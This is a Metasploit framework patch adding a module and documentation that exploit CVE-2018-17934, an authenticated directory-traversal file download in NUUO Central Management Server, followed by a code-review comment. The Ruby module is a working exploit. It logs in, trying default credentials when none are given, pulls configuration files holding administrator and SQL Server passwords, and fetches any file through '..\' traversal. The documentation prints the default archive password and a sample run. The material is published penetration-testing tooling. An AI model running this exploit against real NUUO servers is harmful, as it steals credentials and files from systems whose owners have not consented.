From 80147f5ad800a5b4611cbd8b93947c7f7563bbac Mon Sep 17 00:00:00 2001
From: Jacob Robles
Date: Wed, 20 Feb 2019 07:06:49 -0600
Subject: [PATCH] Land #11293, Add Nuuo CMS file download
---
 .../gather/nuuo_cms_file_download.md | 71 +++++++++++++++
 .../gather/nuuo_cms_file_download.rb | 86 +++++++++++++++++++
 2 files changed, 157 insertions(+)
 create mode 100644 documentation/modules/auxiliary/gather/nuuo_cms_file_download.md
 create mode 100644 modules/auxiliary/gather/nuuo_cms_file_download.rb
diff --git a/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md
new file mode 100644
index 000000000000..9a8e9f611d3e
--- /dev/null
+++ b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md
@@ -0,0 +1,71 @@
+## Description
+
+Nuuo CMS Authenticated Arbitrary File Download
+
+The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below:
+
+```
+GETCONFIG NUCM/1.0
+FileName:
+FileType:
+User-Session-No:
+```
+
+The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail.
+
+The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including:
+
+- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password)
+- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password
+- Any other sensitive files in the drive where CMS Server is installed.
+
+This module works in the following way:
+
+- if a SESSION number is present, uses that to login
+- if not, tries to authenticate with USERNAME and PASSWORD
+
+Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
+
+The following versions were tested:
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.2 OK
+ - 2.4.0 OK
+ - 2.6.0 OK
+ - 2.9.0 OK
+ - 2.10.0 OK
+ - 3.1 OK
+ - 3.3 OK
+ - 3.5 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server 2.4.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
+
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg
+[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database.
+[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem,
+[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit.
+[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the
+[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them.
+[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed!
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_file_download) >
+```
+
+## References
+
+- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
diff --git a/modules/auxiliary/gather/nuuo_cms_file_download.rb b/modules/auxiliary/gather/nuuo_cms_file_download.rb
new file mode 100644
index 000000000000..33f19cfc8d5c
--- /dev/null
+++ b/modules/auxiliary/gather/nuuo_cms_file_download.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Nuuo
+ include Msf::Auxiliary::Report
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download',
+ 'Description' => %q{
+ The Nuuo Central Management Server allows an authenticated user to download files from the
+ installation folder. This functionality can be abused to obtain administrative credentials,
+ the SQL Server database password and arbitrary files off the system with directory traversal.
+ The module will attempt to download CMServer.cfg (the user configuration file with all the user
+ passwords including the admin one), ServerConfig.cfg (the server configuration file with the
+ SQL Server password) and a third file if the FILE argument is provided by the user.
+ The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
+ included in Metasploit, these files cannot be decrypted programmatically. The user will
+ have to open them with zip or a similar program and provide the default password "NUCMS2007!".
+ This module will either use a provided session number (which can be guessed with an auxiliary
+ module) or attempt to login using a provided username and password - it will also try the
+ default credentials if nothing is provided.
+ All versions of CMS server up to and including 3.5 are vulnerable to this attack.
+ },
+ 'Author' =>
+ [
+ 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2018-17934' ],
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
+ [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
+ [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
+
+ ],
+ 'Platform' => ['win'],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Oct 11 2018'))
+
+ register_options(
+ [
+ OptString.new('FILE', [false, 'Additional file to download, use ..\\ to traverse directories from \
+ the CMS install folder'])
+ ])
+ end
+
+ def download_file(file_name, ctype='application/zip', decrypt=true)
+ dl_file = nucs_download_file(file_name, decrypt)
+ file_name = file_name.gsub('..\\', '')
+
+ path = store_loot(file_name, ctype, datastore['RHOST'],
+ dl_file, file_name, "Nuuo CMS #{file_name} downloaded")
+ print_good("Downloaded file to #{path}")
+ end
+
+
+ def run
+ nucs_login
+
+ unless @nucs_session
+ fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
+ end
+
+ download_file('CMServer.cfg')
+ download_file('ServerConfig.cfg')
+
+ # note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed
+ # see the download_file method for details
+ print_status('The user and server configuration files were stored in the loot database.')
+ print_status('The files are ZIP encrypted, and due to the lack of the archive/zip gem,')
+ print_status('they cannot be decrypted in Metasploit.')
+ print_status('You will need to open them up with zip or a similar utility, and use the')
+ print_status('password NUCMS2007! to unzip them.')
+ print_status('Annoy the Metasploit developers until this gets fixed!')
+
+ if datastore['FILE']
+ filedata = download_file(datastore['FILE'], 'application/octet-stream', false)
+ end
+ end
+end
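Review bot: In `run`, the local `filedata` is assigned from `download_file` but never read, and `download_file` ends with `print_good`, so the value it returns is not the file contents anyway; drop the local and use the modifier form, `download_file(datastore['FILE'], 'application/octet-stream', false) if datastore['FILE']`. In `download_file` the `gsub('..\\', '')` strips only the literal `..\` token before `file_name` is reused as both the loot type and the loot filename, so any other path characters in a user-supplied FILE pass straight into `store_loot`; if `store_loot` sanitizes names itself this is harmless, but a comment such as `# cosmetic only: name the loot entry after the bare file, not the traversal path` would make clear that the cleanup is not a security control. The comment above the `print_status` lines sends the reader to "the download_file method" for the archive/zip change, yet the decryption decision is made in `nucs_download_file` from the Nuuo mixin, which lives outside this file — naming that method would avoid pointing a maintainer at the wrong place. The `unless @nucs_session ... end` block would read more idiomatically as the one-liner `fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') unless @nucs_session`.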